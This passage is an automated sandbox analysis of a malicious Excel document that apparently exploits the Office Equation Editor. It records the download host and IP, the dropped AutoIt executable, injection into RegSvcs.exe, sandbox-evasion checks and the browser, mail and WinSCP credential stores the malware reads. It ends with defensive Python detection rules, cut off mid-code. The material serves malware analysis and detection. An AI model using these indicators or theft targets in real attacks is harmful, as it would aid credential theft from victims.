                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00D448D7
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DC5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_00DC5376
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D63187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00D63187
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (5 occurrences)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (3 occurrences)
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Process information set: NOOPENFILEERRORBOX (5 occurrences)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX (37 occurrences)

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe API/Special instruction interceptor: Address: 994D2C
                  Source: ghxtg8op.exe, 00000005.00000002.486376927.0000000000996000.00000004.00000020.00020000.00000000.sdmp, ghxtg8op.exe, 00000005.00000003.483312295.000000000099D000.00000004.00000020.00020000.00000000.sdmp, ghxtg8op.exe, 00000005.00000003.483235437.000000000098B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXEG
                  Source: ghxtg8op.exe, 00000005.00000002.486156128.0000000000924000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXERG
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_5-105610
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe API coverage: 4.6 %
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3628 Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DA445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00DA445A
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DAC6D1 FindFirstFileW,FindClose,5_2_00DAC6D1
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DAC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00DAC75C
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DAEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00DAEF95
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DAF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00DAF0F2
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DAF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00DAF3F3
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DA37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00DA37EF
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DA3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00DA3B12
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00DABCBC
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00D449A0
                  Source: EQNEDT32.EXE Binary or memory string: a7xK0IOPuRkEw7cBi541oAvQ2V3mw13Nb4AabQLZJTi1TiBJoNLiEQZ8vmUn0hYNBZwNqokcJ4K9IguEkRZlpPJo9HSRMgKlr24MnMtjOaMESw473fYpd1QdFQkO4ufh9sLAS0327SbxxMv8ET3ZfACijc8I8GrKbUXUsdVh15pyrsmPqGsdzkuGAHOpceCnkIQx58XtbsovBNu8PQmfbfpO2nJcX0wI7gmE7SRlQEMUwmaRSOYMXqGGvagLuBNxE5Pz
                  Source: EQNEDT32.EXE Binary or memory string: jSJXcXxC8jYB95SixbHM1iHX42BWQP0TaALv2boMNpjAZg5gb4hgFSmxBdVDJk3HJVmNVlfquI22akWPDuExrICpBs9Cc3NU4y0fg3OvtgsZrJiBvfGyWHSQCIWF0OtO19RaDUusUVeY1PXHurCVrRS4OP278mVGKWUvm770pIkml5uzJ2SKYm60wl5cdF7N8dYS1xvZ6ab0iMjaIjRFFNJWys6WBpd2a22wa2FsRvc1XGuM1SY1cDyueISbRYxUrENC
                  Source: EQNEDT32.EXE Binary or memory string: vtSnJ7pmP4ZylMwRqsJv0xg8ancIV2BuqhRksIr6DFGMLVqhDSYAI2bti9LfkJKbVVdIsLSwkUxxTEFiWRrWUeBwGUPGVJWKJ6hTEanpPbIp4qI1Bbq1U4ZmdZS9fKxcgHHJrG2GcMyz1a9AckChDawyGCAM9dm01o4qfgJpkXcUGlygDcZaZTQ1W8AtrV81jUg5Y7o0FvuKgeu4N1ciS1CTqA8oiECBD4o6PqeMUITZBW8tXjy7mVQrc4i7b462sM5t
                  Source: EQNEDT32.EXE Binary or memory string: yO3gjjQlAeIQaRwgS6OFFX3kesUC7DasRPmFmHgFsxwoSaEgx9fIUcMD1NCWrrzcKPlHiRKqVq7ooYIY5Z2K4x7azKmR2TmV2CgnQWV6Q4WQXcJpE99LsqUMxWu0YJ44yXAqonMX2PmhY4R2ogfPpYd4LjEFJg3pYDsRnW4gmfZemBpjFxFXpNhHXjOBDrsKB0UcI0n42cWK5FcQujXlmaqUxK3qA7h5FidPBWfEE3KkQWzdFnD8bTEE1HtH5kfeB6zq
                  Source: EQNEDT32.EXE Binary or memory string: cG75oCxrsAvcosQVK5ksLqLmqzCWxybZHn3lRLSazrfvOk4rOWcsd9yFOX3clGcwudJefxpyN0LdypJhGlGkagAGXWnGA1QBBnp3eYSohbt2jfXmcrckNyLbwzLkJoR5lKVEWflrbhBQnmAv4qaA8Zt4GybLL83PHGFSTq9vkJ83LictKi4H3yEP9UULSYfxPcw2ec2lnVfEXzHS0YyOGjkRGbt1lZiUnQWFCUoANHfEW8YPmMDlwMsvFIjfRkan7jtL
                  Source: EQNEDT32.EXE Binary or memory string: 1hPBckyaFYmpvZk5thVZJzErKamQIx5ULJp85KHYh5Uj7Jc9bme0U3EOEOo0Z33tBaVZMiPJ38tm7qNnrTBUl7QXYAAoRcoCbRjdzJ8VMcI7TYpfghPBdbdvLpAzQ583bllVVXFmdQxvisiQ7MaFevbFcG4h3rn6ETtJPnXovSALNCrhBL0qLS89QN96sLb2VTQDGTlFFdCWzw0BvZw7Ee1Hm6hMOvJUSebOa0jjdrKd4UxWNxgDrs0JiJ0bA2h69xjz
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe API call chain: ExitProcess graph end node graph_5-104947
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe API call chain: ExitProcess graph end node graph_5-104519
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DB3F09 BlockInput,5_2_00DB3F09
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D43B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00D43B3A
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D75A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_00D75A7C
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D44B37 LoadLibraryA,GetProcAddress,5_2_00D44B37
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03560567 mov edx, dword ptr fs:[00000030h] 2_2_03560567
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00993978 mov eax, dword ptr fs:[00000030h] 5_2_00993978
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00994F98 mov eax, dword ptr fs:[00000030h] 5_2_00994F98
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00994FF8 mov eax, dword ptr fs:[00000030h] 5_2_00994FF8
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D980A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,5_2_00D980A9
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D6A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00D6A155
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D6A124 SetUnhandledExceptionFilter,5_2_00D6A124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D987B1 LogonUserW,5_2_00D987B1
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D43B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00D43B3A
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00D448D7
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DA4C53 mouse_event,5_2_00DA4C53
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D97CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00D97CAF
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D9874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_00D9874B
                  Source: ghxtg8op.exe, 00000005.00000000.482962513.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp, ghxtg8op.exe.2.dr, ngown[1].exe.2.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: ghxtg8op.exe Binary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D6862B cpuid 5_2_00D6862B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D74E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00D74E87
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D81E06 GetUserNameW,5_2_00D81E06
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D73F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_00D73F3A
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00D449A0
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match File source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.ghxtg8op.exe.d00000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: ghxtg8op.exe PID: 3752, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3788, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\FTP Navigator\Ftplist.txt
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 occurrences)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: ghxtg8op.exe Binary or memory string: WIN_81
                  Source: ghxtg8op.exe Binary or memory string: WIN_XP
                  Source: ghxtg8op.exe Binary or memory string: WIN_XPe
                  Source: ghxtg8op.exe Binary or memory string: WIN_VISTA
                  Source: ghxtg8op.exe Binary or memory string: WIN_7
                  Source: ghxtg8op.exe Binary or memory string: WIN_8
                  Source: ngown[1].exe.2.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara match File source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.ghxtg8op.exe.d00000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000006.00000002.635675466.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: ghxtg8op.exe PID: 3752, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3788, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match File source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.ghxtg8op.exe.d00000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: ghxtg8op.exe PID: 3752, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3788, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DB6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00DB6283
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00DB6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00DB6747
                  MITRE ATT&CK Matrix (a leading number in a cell is the count of signatures matched to that technique; cells without a number are unmatched placeholder techniques)

                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 121 Windows Management Instrumentation | 1 Scripting | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 13 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                  Credentials | Domains | Default Accounts | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 121 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | 33 Exploitation for Client Execution | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | 1 Credentials in Registry | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 138 System Information Discovery | Distributed Component Object Model | 121 Input Capture | 22 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 212 Process Injection | 1 Masquerading | LSA Secrets | 341 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Valid Accounts | Cached Domain Credentials | 12 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Virtualization/Sandbox Evasion | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 Remote System Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph (ID 1572388). Sample: Nova naredba_HR-WJO-12-10-2... Start date: 10/12/2024. Architecture: WINDOWS. Score: 100.

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 15 other signatures.

Process chain (each process is started by the one above it):

EXCEL.EXE
    dropped: ~$Nova naredba_HR-...2-10-2024.xlam.xlsx (data)
  EQNEDT32.EXE
    network: aquafusion.com.co (190.90.160.170), local port 49165 to remote port 80, GTDCOLOMBIASASCO, Colombia
    dropped: C:\Users\user\AppData\Local\...\ghxtg8op.exe (PE32)
    dropped: C:\Users\user\AppData\Local\...\ngown[1].exe (PE32)
    signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    ghxtg8op.exe
      signatures: Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 3 other signatures
      RegSvcs.exe
        signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 2 other signatures
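The chain in the behavior graph (EXCEL.EXE, then EQNEDT32.EXE fetching ngown.exe from 190.90.160.170:80 and starting ghxtg8op.exe, which starts RegSvcs.exe) is exactly what the report's Sigma hits key on. The Python below is an added example, not Joe Sandbox or Sigma project code: it runs those four rules over constructed Sysmon-style events. The field names (EventID, Image, ParentImage, ProcessGuid, TargetFilename, DestinationIp) follow Sysmon, but the events themselves are made up for the example, and the RegSvcs.exe path is an assumption because the report gives only the image name. One caveat the constructed events model deliberately: Equation Editor is activated over DCOM, so its recorded parent is svchost.exe rather than EXCEL.EXE, which is why the rules anchor on EQNEDT32.EXE as parent or actor instead of looking for children of the Office binary.

```python
"""Detection rules for the EQNEDT32.EXE chain in this report, run over constructed events.

Added example (not Joe Sandbox or Sigma code). Event shape is an assumption modelled on
Sysmon: EventID 1 = process create, 3 = network connect, 11 = file create.
"""
from typing import Dict, List, Tuple

# Paths taken from the report; REGSVCS is an assumed path (the report names only the image).
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPER = r"C:\Users\user\AppData\Local\Temp\ghxtg8op.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"

# Constructed events (not taken from the report's PCAP or process logs).
EVENTS: List[Dict] = [
    {"EventID": 1, "ProcessGuid": "p1", "Image": EXCEL, "ParentProcessGuid": "p0",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Equation Editor is activated over DCOM: its logged parent is svchost.exe, not EXCEL.EXE.
    {"EventID": 1, "ProcessGuid": "p2", "Image": EQNEDT, "ParentProcessGuid": "p9",
     "ParentImage": SVCHOST},
    {"EventID": 3, "ProcessGuid": "p2", "Image": EQNEDT, "DestinationIp": "190.90.160.170",
     "DestinationPort": 80},
    {"EventID": 11, "ProcessGuid": "p2", "Image": EQNEDT, "TargetFilename": DROPPER},
    {"EventID": 1, "ProcessGuid": "p3", "Image": DROPPER, "ParentProcessGuid": "p2",
     "ParentImage": EQNEDT},
    {"EventID": 1, "ProcessGuid": "p4", "Image": REGSVCS, "ParentProcessGuid": "p3",
     "ParentImage": DROPPER},
    # Benign noise that none of the rules should flag.
    {"EventID": 1, "ProcessGuid": "p5", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentProcessGuid": "p0", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "ProcessGuid": "p1", "Image": EXCEL, "DestinationIp": "10.0.0.5",
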